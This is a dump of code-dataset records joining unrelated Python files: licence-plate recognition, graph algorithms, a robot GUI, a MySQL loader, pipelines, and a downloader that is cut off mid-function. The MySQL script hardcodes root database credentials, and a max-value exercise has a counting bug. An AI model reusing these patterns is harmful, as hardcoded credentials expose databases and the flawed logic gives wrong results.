self.optimizer.state_dict(),\r\n 'scheduler': self.scheduler.state_dict(), 'epoch': self.epoch\r\n }\r\n torch.save(best_state, name)\r\n\r\n def load_model(self, path):\r\n best_state = torch.load(path)\r\n self.net.load_state_dict(best_state['net'])\r\n if self.model == 'train':\r\n self.record = best_state['record']\r\n self.epoch = best_state['epoch']\r\n self.optimizer.load_state_dict(best_state['optimizer'])\r\n self.scheduler.load_state_dict(best_state['scheduler'])\r\n","sub_path":"ResNet-DC/SolverMask.py","file_name":"SolverMask.py","file_ext":"py","file_size_in_byte":13673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"242979708","text":"# 0001 题生成的 200 个激活码(或者优惠券)保存到 MySQL 关系型数据库中。\r\nimport x0001\r\nimport pymysql\r\n\r\ndef store_mysql(codelist):\r\n try:\r\n conn = pymysql.connect(host=\"192.168.100.123\",user=\"root\",password=\"mysql123\",db=\"mysql\",port=3306)\r\n cur = conn.cursor()\r\n except BaseException as e:\r\n print(e)\r\n else:\r\n try:\r\n cur.execute('CREATE DATABASE IF NOT EXISTS pydb_test')\r\n cur.execute('use pydb_test')\r\n sql = '''CREATE TABLE IF NOT EXISTS ACcode(\r\n id INT NOT NULL AUTO_INCREMENT,\r\n code VARCHAR(64) NOT NULL,\r\n primary key (id)\r\n )'''\r\n cur.execute(sql)\r\n\r\n for ch in list1:\r\n cur.execute('INSERT INTO ACcode (code) values (%s)', (ch) )\r\n cur.connection.commit()\r\n except BaseException as e:\r\n print(e)\r\n finally:\r\n cur.close()\r\n conn.close()\r\n\r\nif __name__=='__main__':\r\n list1 = x0001.get_ACCode()\r\n store_mysql(list1)\r\n\r\n","sub_path":"LuHR_showcode/x0002.py","file_name":"x0002.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"389411950","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : schackartk\nDate : 2019-04-09\nPurpose: Find Hamm distances between words in files\n\"\"\"\n\nimport argparse\nimport sys\nimport logging\nimport os\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get command-line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Find Hamm distances between words in files',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n 'files',\n metavar='FILE',\n nargs=2,\n help='Files containing strings for analysis')\n\n parser.add_argument(\n '-d',\n '--debug',\n help='Turn on debugging',\n action='store_true')\n\n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef warn(msg):\n \"\"\"Print a message to STDERR\"\"\"\n print(msg, file=sys.stderr)\n\n\n# --------------------------------------------------\ndef die(msg='Something bad happened'):\n \"\"\"warn() and exit with error\"\"\"\n warn(msg)\n sys.exit(1)\n\n# --------------------------------------------------\ndef dist(s1,s2):\n \n return sum(l1 != l2 for l1,l2 in zip(s1,s2)) + abs(len(s1) - len(s2))\n\n# --------------------------------------------------\ndef main():\n args = get_args()\n files = args.files\n words = [[],[]]\n\n logging.basicConfig(\n filename='.log',\n filemode='w',\n level=logging.DEBUG if args.debug else logging.CRITICAL\n )\n\n for f in files:\n if not os.path.isfile(f):\n die('\"{}\" is not a file'.format(f)) \n \n logging.debug('file1 = {}, file2 = {}'.format(files[0],files[1]))\n\n for i, fi in enumerate(files):\n with open(fi) as f:\n words[i] = [word for line in f for word in line.split()]\n \n word_pairs = list(zip(words[0],words[1]))\n \n total =0\n for s1,s2 in word_pairs:\n distance = dist(s1,s2)\n logging.debug('s1 = {}, s2 = {}, d = {}'.format(s1,s2,distance))\n total += distance\n print(total)\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/13-hamm/hamm.py","file_name":"hamm.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"449284085","text":"# Importing necessary packages\r\nimport cv2\r\nimport os\r\nimport sys\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nimport random\r\nfrom matplotlib import gridspec\r\nfrom collections import Counter\r\nfrom keras.models import model_from_json\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\n# This function locates the plate by using Haar cascade classifier and returns the cropped plate image\r\ndef extract_plate(img):\r\n\timage_copy = img.copy()\r\n\t\r\n\t# Loading the pretrained haar cascade classifier\r\n\tplate_cascade = cv2.CascadeClassifier('./indian_license_plate.xml')\r\n\r\n\t# Detecting the candidate number plates and storing their co-ordinates\r\n\tplate_rect = list(plate_cascade.detectMultiScale(image_copy, scaleFactor = 1.3, minNeighbors = 7))\r\n\t\r\n\t# In case classifier is unable to detect the plate, we stop the program\r\n\tif len(plate_rect)==0:\r\n\t\tprint('Sorry! Unable to detect plate for this image.')\r\n\t\tsys.exit()\r\n\t\treturn -1\r\n\t\r\n\t# Sorting in decreasing order of area (w*h) to get the largest bounding rectangle\r\n\tplate_rect.sort(reverse=True,key=lambda x:x[2]*x[3])\r\n\tx,y,w,h = plate_rect[0]\r\n\t\r\n\t# Adjusting the co-ordinates so that the whole plate gets cropped\r\n\tx-=35 ; w+=70\r\n\ta,b = 2,2\r\n\tplate = image_copy[y+a:y+h-a, x+b:x+w-b, :]\r\n\t\r\n\t# Finally representing the detected contours by drawing rectangles around the edges.\r\n\tcv2.rectangle(image_copy, (x,y), (x+w, y+h), (51,255,25), 2)\r\n\t\r\n\t# Showing the detected plate with cropped plate\r\n\tcv2.imshow(\"Detected Plate\", image_copy) \r\n\tcv2.imshow(\"Cropped Plate\", plate) \r\n\tcv2.waitKey(0)\r\n\t\r\n\t# Returning the plate detected image and cropped plate image with its cordinates\r\n\treturn image_copy,plate,x,y\r\n\r\n# This function processes the plate image for character segmentation\r\ndef process_plate(plate_image):\r\n\t\r\n\t# Applying different filters to make it easy to detect contours of characters in the plate\r\n\t# These steps were found to be the most effective-\r\n\t# Cropped plate-->Grayscale-->Gaussian Blur-->Adaptive Thresholding-->Morphological Opening\r\n\r\n\tgray = cv2.cvtColor(plate_image, cv2.COLOR_BGR2GRAY)\r\n\tblur = cv2.GaussianBlur(gray,(5,5),0)\r\n\tbinary = cv2.threshold(blur, 255, 255,cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\r\n\tkernel3 = cv2.getStructuringElement(cv2.MORPH_RECT, (3,3))\r\n\tthre_mor = cv2.morphologyEx(binary, cv2.MORPH_ERODE, kernel3)\r\n\tthresh2 = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV, 21, 5)\r\n\topened = cv2.morphologyEx(thresh2, cv2.MORPH_OPEN, kernel3)\r\n\r\n\t# Displaying various filtered plates\r\n\tcv2.imshow('Grayscale',gray)\r\n\tcv2.imshow('Gaussian Blurred',blur)\r\n\tcv2.imshow('Binary',binary)\r\n\tcv2.imshow('Eroded',thre_mor)\r\n\tcv2.imshow('Adaptive Thresholded',thresh2)\r\n\tcv2.imshow('Morphologically Opened',opened)\r\n\tcv2.waitKey(0)\r\n\r\n\t# Returning the processed plate\r\n\treturn opened\r\n\r\n# This function sorts the characters according to their x-coordinate i.e. from left to right\r\ndef sort_contours(cnts):\r\n\t# Creating bounding box for every character contour\r\n\tboundingBoxes = [cv2.boundingRect(c) for c in cnts]\r\n\t(cnts, boundingBoxes) = zip(*sorted(zip(cnts, boundingBoxes),key=lambda b: b[1][0]))\r\n\treturn cnts\r\n\r\n# This function detects the contours of all characters and returns a list containing all the cropped characters\r\ndef character_segmentation(plate_image,processed_plate):\r\n\ttry:\t\r\n\t\t# Creating copies of plate_image to draw character contours and their bounding boxes\r\n\t\ttest_roi = plate_image.copy()\r\n\t\ttest_box = plate_image.copy()\r\n\r\n\t\t# Finding contours in the processed plate\r\n\t\tcont, _ = cv2.findContours(processed_plate, cv2.RETR_LIST , cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n\t\t# Drawing the contours in the copy image\r\n\t\t_=cv2.drawContours(test_roi,cont,-1,(255,0,255),2)\r\n\r\n\t\t# Initializing several lists-\r\n\t\tchar_list=[] # To store co-ordinates of all possible characters\r\n\t\theight_list=[]\t\t\t\t# To store heights of all characters\r\n\t\tcrop_characters=[]\t\t\t# To store cropped images of all characters \r\n\r\n\t\t# Here some approximations are used to filter out the character contours from other contours\r\n\t\t# Traversing in the sorted list of all contours\r\n\t\tfor i,c in enumerate(sort_contours(cont)):\r\n\t\t\t# Getting co-ordinates of contours\r\n\t\t\t(x,y,w,h) = cv2.boundingRect(c)\r\n\t\t\t\r\n\t\t\t# Selecting contours with defined h/w ratio\r\n\t\t\tratio=h/w\r\n\t\t\tif 1<=ratio<=10:\r\n\r\n\t\t\t\t# Selecting contours which have height larger than 50% of the plate but less than whole height\r\n\t\t\t\tif 0.35<=h/plate_image.shape[0]<0.9: \r\n\t\t\t\t\t\r\n\t\t\t\t\t# To avoid redundant characters in case of O and D because inner and outer regions are detected as separate contours\r\n\t\t\t\t\tif len(char_list)>1:\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t# If absolute difference of x-coodinates of two contours is less than 8 pixels than we simply skip the second one\r\n\t\t\t\t\t\tif abs(x-char_list[-1][0])<8:continue\r\n\r\n\t\t\t\t\t# Appending those contours which satisfies the above approximations\r\n\t\t\t\t\tchar_list.append((x,y,w,h))\r\n\t\t\t\t\theight_list.append(h)\r\n\r\n\t\t# Still there might be some non-character contours present in char_list\r\n\t\t# Filtering out by selecting only those contours which are approximately same height as most of the contours present in the char_list\r\n\t\tapx_height=Counter(height_list).most_common()[0][0]\r\n\t\tfor x,y,w,h in char_list:\r\n\r\n\t\t\t# Selecting only those which are approximately equal to the apx_height\r\n\t\t\tif apx_height-3<=h<=apx_height+3:\r\n\t\t\t\t# Cropping characters from processed_plate\r\n\t\t\t\tcurr_num = processed_plate[y:y+h,x:x+w] # pehle binary tha\r\n\t\t\t\tcurr_num = cv2.resize(curr_num, dsize=(30,60))\r\n\t\t\t\t # Removing blurness from characters\r\n\t\t\t\t_, curr_num = cv2.threshold(curr_num, 220, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n\t\t\t\t# Storing characters in the final list\r\n\t\t\t\tcrop_characters.append(curr_num)\r\n\t\t\t\t# Drawing bounding boxes around detected charcters\r\n\t\t\t\tcv2.rectangle(test_box, (x, y), (x + w, y + h), (0, 255,0), 2)\r\n\r\n\t\t# Displaying contours and bounding boxes of characters in the plate\r\n\t\tcv2.imshow('Contours',test_roi)\r\n\t\tcv2.imshow('Bounding Boxes',test_box)\r\n\t\tcv2.waitKey(0)\r\n\r\n\t\t# Returning final list of characters\r\n\t\treturn crop_characters\r\n\r\n\t# In case of error in detecting plate\r\n\texcept:\r\n\t\tprint(\"Sorry! The plate isn't detected properly\")\r\n\t\tsys.exit()\r\n\r\n# This function loads the MobileNets model pretrained on ImageNet dataset and fine tuned for detecting characters\r\ndef load_model():\r\n\r\n\t# Loading model architecture\r\n\tjson_file = open('MobileNets_character_recognition.json','r')\r\n\tloaded_model_json = json_file.read()\r\n\tjson_file.close()\r\n\r\n\t# Loading weights\r\n\tmodel = model_from_json(loaded_model_json)\r\n\tmodel.load_weights(\"License_character_recognition_weight.h5\")\r\n\tprint(\"[INFO] Model loaded successfully...\")\r\n\r\n\t# Loading labels\r\n\tlabels = LabelEncoder()\r\n\tlabels.classes_ = np.load('license_character_classes.npy')\r\n\tprint(\"[INFO] Labels loaded successfully...\")\r\n\r\n\treturn model,labels\r\n\r\n# This function predicts the character in the image\r\ndef predict_from_model(image,model,labels):\r\n\r\n\t# Reshaping numpy array according to the input layer of the model\r\n\timage = cv2.resize(image,(80,80))\r\n\r\n\t# Transforming image to 3-D because the model takes 3-D images as input\r\n\timage = np.stack((image,)*3, axis=-1)\r\n\r\n # Inverse transforming the prediction to get its label\r\n\tprediction = labels.inverse_transform([np.argmax(model.predict(image[np.newaxis,:]))])\r\n\r\n\t# Returning the prediction as a single character array\r\n\treturn prediction\r\n\r\n# This is the main function\r\ndef main(img):\r\n\t# Path of the image whose plate is to be detected\r\n\tpath = './Dataset/'+img\r\n\t\r\n\t# Reading the image\r\n\timage = cv2.imread(path)\r\n\r\n\t# Displaying the image\r\n\tcv2.imshow(\"Initial Image\", image)\r\n\tcv2.waitKey(0) \r\n\t\r\n\t# Extracting the plate and its details from the image\r\n\tdetected_image,plate_image,x,y = extract_plate(image)\r\n\r\n\t# Processing the plate before character segmentation\r\n\tprocessed_plate = process_plate(plate_image)\r\n\r\n\t# Performing character segmentation on processed_plate\r\n\tcrop_characters = character_segmentation(plate_image,processed_plate)\r\n\r\n\t# Loading pre-trained model and labels\r\n\tmodel,labels = load_model()\r\n\r\n\t# Creating a figure to display segmented characters\r\n\tfig = plt.figure(figsize=(10,3))\r\n\tfig.suptitle('Segmented Characters')\r\n\tcols = len(crop_characters)\r\n\r\n\t# If all characters aren't detected properly we stop the program\r\n\tif cols<6:\r\n\t\tprint(\"Sorry! The plate isn't detected properly\")\r\n\t\tsys.exit()\r\n\r\n\t# Creating grid to hold subplots(character images)\r\n\tgrid = gridspec.GridSpec(ncols=cols,nrows=1,figure=fig)\r\n\r\n\t# Finally predicting each character image and displaying its predicted label as the title of subplot\r\n\tfinal_string = ''\r\n\tfor i,character in enumerate(crop_characters):\r\n\t fig.add_subplot(grid[i])\r\n\t title = np.array2string(predict_from_model(character,model,labels))\r\n\t plt.title('{}'.format(title.strip(\"'[]\"),fontsize=20))\r\n\t final_string+=title.strip(\"'[]\")\r\n\t plt.axis(False)\r\n\t plt.imshow(character,cmap='gray')\r\n\tplt.show()\r\n\r\n\t# Displaying the final output image\r\n\tdetected_image=cv2.putText(detected_image,final_string,(x+50,y-20),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,0),2)\r\n\tprint(final_string)\r\n\tcv2.imshow('Final Image', detected_image)\r\n\tcv2.waitKey(0)\r\n\r\nif __name__=='__main__':\r\n\r\n\t# Setting path of the dataset\r\n\tdataset_path=os.path.join(os.getcwd(),'Dataset')\r\n\r\n\t# Acquiring all the images in the dataset\r\n\timage_list=os.listdir(dataset_path)\r\n\r\n\t# Selecting a random image from our dataset\r\n\tn=random.randrange(0,len(image_list))\r\n\trandom_image=image_list[n]\r\n\tprint(random_image)\r\n\t# Passing random_image for number plate recognition\r\n\tmain(random_image)","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":9627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"21156455","text":"#!/usr/bin/env python3\n\nimport collections\nimport sys\n\n# Read Graph\n\ndef read_graph():\n graph = collections.defaultdict(dict)\n\n for edge, line in enumerate(sys.stdin):\n s, t = map(int, line.split())\n graph[s][t] = edge\n graph[t][s] = edge\n\n return graph\n\n# Find Circuit\n\ndef find_circuit(graph, start, vertex, visited, path):\n ''' Recursive DFS traversal '''\n # If we have returned to start, return path\n if path and start == vertex:\n return path\n\n # Visit each unvisited outgoing edge\n for neighbor in graph[vertex]:\n if graph[vertex][neighbor] in visited:\n continue\n\n # Mark visited\n visited.add(graph[vertex][neighbor])\n\n # Add to path\n path.append((vertex, neighbor))\n\n # Recurse\n if find_circuit(graph, start, neighbor, visited, path):\n return path\n\n # Remove from path\n path.pop(-1)\n\n # Unmark visited\n visited.remove(graph[vertex][neighbor])\n\n # No circuit found, so return nothing\n return []\n\n# Find Eulerian Circuit\n\ndef find_euler_circuit(graph):\n ''' Iteratively compute subcircuit until all edges have been travsrsed or\n no circuit is possible '''\n start = list(graph.keys())[0] # Starting vertex\n visited = set() # Visited edges (set of edge ordinals)\n circuit = [] # Eulerian circuit (list of edges)\n index = 0 # Where in circuit to insert subcircuit\n\n while start:\n # Find subcircuit and insert it after current component\n path = find_circuit(graph, start, start, visited, [])\n circuit = circuit[0:index] + path + circuit[index:]\n\n # Check if any nodes in current circuit have an unused edge, if so, set\n # start so we search for subcircuit beginning at that vertex\n start = None\n for index, vertex in enumerate(source for source, target in circuit):\n for neighbor, edge in graph[vertex].items():\n if edge not in visited:\n start = vertex\n break\n\n return circuit\n\n# Main Execution\n\ndef main():\n graph = read_graph()\n circuit = find_euler_circuit(graph)\n\n for source, target in circuit:\n print(source, target)\n\nif __name__ == '__main__':\n main()\n","sub_path":"lecture11/exercise11-B/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"346729529","text":"import logging\nfrom settings import STARTED, ENDED, NS\nfrom usavich.indicator.coindicator import CoIndicator\nfrom usavich.utils.deco import indsetdecorator\nfrom usavich.indicator.base import Base\n\n\n@indsetdecorator\nclass MacInsUnins(Base):\n\n goal = 'mac'\n\n def compute(self):\n key = self.key\n goal = self.goal\n extend = self.extend\n full_context = self.context.__class__(STARTED, self.ended)\n ended_str = str(ENDED)\n ins_rdd = full_context.parsed_rdd(\n 'MacInsUnins').filter(lambda row: row.unins_dt_str < ended_str)\n co_ins_rdd = CoIndicator(rdd=ins_rdd)\n co_uv = co_ins_rdd.uv_by_flat_key(\n key, goal, extend, numSplits=NS(128))\n return co_uv\n","sub_path":"indicator/mac_unins.py","file_name":"mac_unins.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"602587610","text":"\"\"\"\n Capstone Project. Code to run on a LAPTOP (NOT the robot).\n Displays the Graphical User Interface (GUI) and communicates with the robot.\n\n Authors: Dr. Boutell, Dr. Mutchler (for the framework)\n and James Werne.\n Winter term, 2018-2019.\n\"\"\"\n\nimport mqtt_remote_method_calls as com\nimport tkinter\nfrom tkinter import ttk\nimport m2_gui\nimport rosebot\nimport time\n\n\nclass MyDelegate(object):\n \"\"\" Constructs PC delegate object. Has\n handlers for changing anxiety, changing\n hostility levels, and for printing on the\n console (for troubleshooting purposes)\"\"\"\n\n def __init__(self):\n self.enabled = True\n\n def handle_change_anxiety(self, distance):\n m2_gui.change_anxiety(int(distance))\n\n def handle_change_hostility(self):\n m2_gui.change_hostility()\n\n def print_on_pc(self, message):\n print(str(message))\n\n\ndef main():\n \"\"\"\n This code, which must run on a LAPTOP:\n 1. Constructs a GUI for my part of the Capstone Project.\n 2. Communicates via MQTT with the code that runs on the EV3 robot.\n \"\"\"\n # -------------------------------------------------------------------------\n # Construct and connect the MQTT Client:\n # -------------------------------------------------------------------------\n # Creates mqtt sender to call methods on robot\n pc_delegate = MyDelegate()\n mqtt_sender = com.MqttClient(pc_delegate)\n mqtt_sender.connect_to_ev3()\n\n # Created pc delegate, then used it as object to receive messages from robot\n mqtt_receiver = mqtt_sender\n\n # -------------------------------------------------------------------------\n # The root TK object for the GUI:\n # -------------------------------------------------------------------------\n # Created tkinter window\n root = tkinter.Tk()\n root.title(\"Capstone Project - James\")\n\n # -------------------------------------------------------------------------\n # The main frame, upon which the other frames are placed.\n # -------------------------------------------------------------------------\n # Established primary frame & gridded it\n main_frame = ttk.Frame(root, padding=10, borderwidth=5, relief=\"groove\")\n main_frame.grid()\n\n # -------------------------------------------------------------------------\n # Sub-frames for the m2_GUI\n # -------------------------------------------------------------------------\n # Called other frames using get_shared_frames method\n perform_frame, teleop_frame, arm_frame, control_frame, drivesystem_frame, soundmaker_frame = get_shared_frames(\n main_frame, mqtt_sender)\n\n # sprint_2_frame = sprint_2_frames(main_frame, mqtt_sender)\n # sprint_2_1_frame = sprint_3_frames(main_frame, mqtt_sender)\n # grid_frames(teleop_frame, arm_frame, control_frame, drivesystem_frame, soundmaker_frame, IR_Frame, color_sensor_frame,\n # cameraFrame, sprint_2_frame, sprint_2_1_frame)\n\n # -------------------------------------------------------------------------\n # Frames that are particular to my individual contributions to the project.\n # -------------------------------------------------------------------------\n # TODO: Implement and call get_my_frames(...)\n\n # -------------------------------------------------------------------------\n # Grid the frames.\n # -------------------------------------------------------------------------\n\n # Grids frames for Sprint 3\n real_grid_frames(perform_frame, teleop_frame)\n\n # -------------------------------------------------------------------------\n # The event loop:\n # -------------------------------------------------------------------------\n\n root.mainloop()\n\n\ndef get_shared_frames(main_frame, mqtt_sender):\n perform_frame = m2_gui.get_perform_frame(main_frame, mqtt_sender)\n teleop_frame = m2_gui.get_teleoperation_frame(main_frame, mqtt_sender)\n arm_frame = m2_gui.get_arm_frame(main_frame, mqtt_sender)\n control_frame = m2_gui.get_control_frame(main_frame, mqtt_sender)\n drivesystem_frame = m2_gui.get_drivesystem_frame(main_frame, mqtt_sender)\n soundmaker_frame = m2_gui.get_soundmaker_frame(main_frame, mqtt_sender)\n\n return perform_frame, teleop_frame, arm_frame, control_frame, drivesystem_frame, soundmaker_frame\n\n\ndef grid_frames(teleop_frame, arm_frame, control_frame, drivesystem_frame, soundmaker_frame, IR_Frame,\n color_sensor_frame,\n cameraFrame, sprint_2_frame, sprint_2_1_frame):\n teleop_frame.grid(row=0, column=0)\n arm_frame.grid(row=1, column=0)\n control_frame.grid(row=2, column=0)\n drivesystem_frame.grid(row=0, column=1)\n soundmaker_frame.grid(row=1, column=1)\n IR_Frame.grid(row=4, column=1)\n color_sensor_frame.grid(row=2, column=1)\n cameraFrame.grid(row=3, column=0)\n sprint_2_frame.grid(row=3, column=1)\n sprint_2_1_frame.grid(row=4, column=0)\n\n\ndef real_grid_frames(perform_frame, teleop_frame):\n # Grids frames for Sprint 3\n\n perform_frame.grid(row=0, column=0)\n teleop_frame.grid(row=1, column=0)\n\n\n# -------- Sprint 1-2 Code: ---------#\n\n\ndef handle_robot_proximity_tone(frequency_entry, inc_frequency_entry, mqtt_sender):\n print('Start at', frequency_entry.get(), 'Hz, then increase by', inc_frequency_entry.get(), \"Hz per inch\")\n mqtt_sender.send_message('robot_proximity_tone', [int(frequency_entry.get()), int(inc_frequency_entry.get())])\n\n\ndef handle_robot_point_to_object(mqtt_sender):\n print('Make Robot Point to Object')\n mqtt_sender.send_message('robot_point_to_object')\n\n\ndef handle_robot_proximity_led(frequency_entry, inc_frequency_entry, mqtt_sender):\n print('Start at', frequency_entry.get(), 'cycles per sec, then increase by', inc_frequency_entry.get(),\n \"cycles per inch\")\n mqtt_sender.send_message('robot_proximity_led', [int(frequency_entry.get()), int(inc_frequency_entry.get())])\n\n\ndef handle_camera_proximity_led(mqtt_sender):\n print('Go to object & blink while driving')\n mqtt_sender.send_message('camera_proximity_led')\n\n\ndef sprint_2_frames(window, mqtt_sender):\n frame = ttk.Frame(window, padding=10, borderwidth=5, relief=\"ridge\")\n\n frame_label = ttk.Label(frame, text=\"Sprint 2: Feature 9 & 10\")\n frame_label.grid(row=0, column=0)\n\n robot_proximity_tone_button = ttk.Button(frame, text=\"Make Tones Frequency Increase with Proximity\")\n robot_proximity_tone_button.grid(row=4, column=0)\n robot_frequency_label = ttk.Label(frame, text=\"Start Frequency:\")\n robot_frequency_entry_box = ttk.Entry(frame, width=8, justify=tkinter.RIGHT)\n robot_inc_frequency_label = ttk.Label(frame, text=\"Frequency Rate of Increase\")\n robot_inc_frequency_entry_box = ttk.Entry(frame, width=8, justify=tkinter.RIGHT)\n\n robot_frequency_label.grid(row=5, column=0)\n robot_frequency_entry_box.grid(row=5, column=1)\n robot_frequency_entry_box.insert(0, '440')\n robot_inc_frequency_label.grid(row=6, column=0)\n robot_inc_frequency_entry_box.grid(row=6, column=1)\n robot_inc_frequency_entry_box.insert(0, 20)\n\n robot_point_to_object_button = ttk.Button(frame, text=\"Make Robot Point Straight to Object\")\n robot_point_to_object_button.grid(row=7, column=0)\n\n robot_proximity_tone_button['command'] = lambda: handle_robot_proximity_tone(\n robot_frequency_entry_box, robot_inc_frequency_entry_box, mqtt_sender)\n robot_point_to_object_button['command'] = lambda: handle_robot_point_to_object(mqtt_sender)\n\n return frame\n\n\ndef sprint_3_frames(window, mqtt_sender):\n frame = ttk.Frame(window, padding=10, borderwidth=5, relief=\"ridge\")\n\n frame_label = ttk.Label(frame, text=\"Sprint 2: Feature 9 & 10\")\n frame_label.grid(row=0, column=0)\n\n robot_proximity_led_button = ttk.Button(frame, text=\"Make LED blink cycle Increase with Proximity\")\n robot_proximity_led_button.grid(row=4, column=0)\n robot_frequency_label = ttk.Label(frame, text=\"Start Cycle Rate:\")\n robot_frequency_entry_box = ttk.Entry(frame, width=8, justify=tkinter.RIGHT)\n robot_inc_frequency_label = ttk.Label(frame, text=\"Cycle Rate of Increase\")\n robot_inc_frequency_entry_box = ttk.Entry(frame, width=8, justify=tkinter.RIGHT)\n\n robot_frequency_label.grid(row=5, column=0)\n robot_frequency_entry_box.grid(row=5, column=1)\n robot_frequency_entry_box.insert(0, '2')\n robot_inc_frequency_label.grid(row=6, column=0)\n robot_inc_frequency_entry_box.grid(row=6, column=1)\n robot_inc_frequency_entry_box.insert(0, '2')\n\n robot_camera_proximity_led_button = ttk.Button(frame, text=\"Make Robot Go To Object & Blink While Driving\")\n robot_camera_proximity_led_button.grid(row=7, column=0)\n\n robot_proximity_led_button['command'] = lambda: handle_robot_proximity_led(\n robot_frequency_entry_box, robot_inc_frequency_entry_box, mqtt_sender)\n robot_camera_proximity_led_button['command'] = lambda: handle_camera_proximity_led(mqtt_sender)\n\n return frame\n\n\ndef printData(client):\n client.send_message('printData')\n\n\ndef lookCW(client, box1, box2):\n client.send_message('CW', [box1.get(), box2.get()])\n\n\ndef lookCCW(client, box1, box2):\n client.send_message('CCW', [box1.get(), box2.get()])\n\n\n# -----------------------------------------------------------------------------\n# Calls main to start the ball rolling.\n# -----------------------------------------------------------------------------\nmain()\n","sub_path":"src/m2_run_this_on_laptop.py","file_name":"m2_run_this_on_laptop.py","file_ext":"py","file_size_in_byte":9372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"543856822","text":"from time import sleep\n\n\ndef maior(* num):\n cont = maior = 0\n print('Analisando os valores passados...')\n for v in num:\n print(f'{v} ', end='', flush=True)\n sleep(0.25)\n if cont == 0:\n cont = maior\n else:\n if v > maior:\n maior = v\n cont += 1\n\n print(f'Foram informados {cont} valores ao todo.')\n print(f'O maior valor informado foi {maior}.')\n\n\ndef lin():\n print('-=' * 30)\n\n\nlin()\nmaior(2, 9, 5, 10, 22, 3)\nlin()\nmaior(4, 3, 4, 99, 100, 21200)\nlin(),\nmaior(298, 488, 309, 634, 678, 234, 845, 562, 147)\nlin()\nmaior(2928, 48138, 309, 634, 6478, 2394, 84335, 562, 101147)\nlin()\nmaior()\n","sub_path":"ex099.py","file_name":"ex099.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"537783942","text":"# -*- coding: utf-8 -*-\n# Copyright (c) Hebes Intelligence Private Company\n\n# This source code is licensed under the Apache License, Version 2.0 found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom kedro.pipeline import Pipeline, node, pipeline\n\nfrom .nodes import fit_model, optimize_model\n\nbaseline = Pipeline(\n [\n node(\n func=optimize_model,\n inputs=[\n \"model_input_data\",\n \"location\",\n \"model_config\",\n \"feature_map\",\n \"distance_metrics\",\n \"params:of_optimize_model\",\n ],\n outputs=[\"opt_params\", \"optimized_model\"],\n name=\"optimize_model\",\n ),\n node(\n func=fit_model,\n inputs=[\n \"model_input_data\",\n \"optimized_model\",\n ],\n outputs=\"mean_model\",\n name=\"fit_model\",\n ),\n ]\n)\n\n\nbaseline_train = pipeline(\n baseline,\n inputs=[\n \"location\",\n \"model_config\",\n \"feature_map\",\n ],\n outputs=[\"opt_params\", \"mean_model\"],\n namespace=\"train\",\n)\n\n\ndef create_pipeline(**kwargs):\n return Pipeline([baseline_train], tags=\"train\")\n","sub_path":"src/eensight/pipelines/baseline/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467487682","text":"from requests import request, Timeout\nfrom requests.exceptions import SSLError\nfrom urllib3 import disable_warnings, exceptions\nfrom os import listdir, makedirs, system\nfrom os.path import exists, isfile, basename\nfrom time import sleep\nfrom re import findall\nfrom bs4 import BeautifulSoup\nfrom collections import Counter\nfrom lxml import etree\nfrom urllib.request import build_opener, install_opener, ProxyHandler\nfrom multiprocessing import Pool, Manager\n\n\n\ndef get_ip():\n pass\n\n\ndef check_local_merge(path, path_file_merged):\n b = []\n if isfile(path_file_merged): # 返回布尔值\n ts_local = False\n else:\n ts_list = listdir(path)\n if ts_list: # 不为空列表\n ts_local = []\n for ts in ts_list:\n index = findall(\"(.*).ts\", ts)[0]\n ts_local.append(int(index))\n else:\n ts_local = ts_list\n\n # 整理index_ts 排序 递增 ts_local: 本地所有ts列表 数字\n ts_local.sort() # 空列表不影响\n # 寻找离散的未下ts\n for i in range(1, len(ts_local)-1):\n i1 = ts_local[i]\n i2 = ts_local[i + 1]\n if i == 0 and i1 != 0: # 比如只有第一个文件0未下的情况\n lst = [a for a in range(i1)]\n b = b + lst\n elif i1 + 1 != i2:\n lst = [a for a in range(i1 + 1, i2)]\n b = b + lst\n ts_dis = b\n return ts_local, ts_dis\n\n\ndef check_local(path, *, mode=None, path_file_merged=None):\n \"\"\"检查本地的已下载情况\n :mode \"m3u8\":\n return: ts_local(列表) ts文件索引号,int(去0),\n :mode\n ,返回 已下完列表name_done 和 未下完字典name_ing\n 一个图集的最后一张照片名含有特殊标记,利用此标记统计已下载的图集名\n\n \"\"\"\n\n if mode is \"m3u8\":\n ts_local, ts_dis = check_local_merge(path, path_file_merged)\n return ts_local, ts_dis\n\n else:\n file_list = listdir(path)\n name_done = [] # 本地图集列表\n 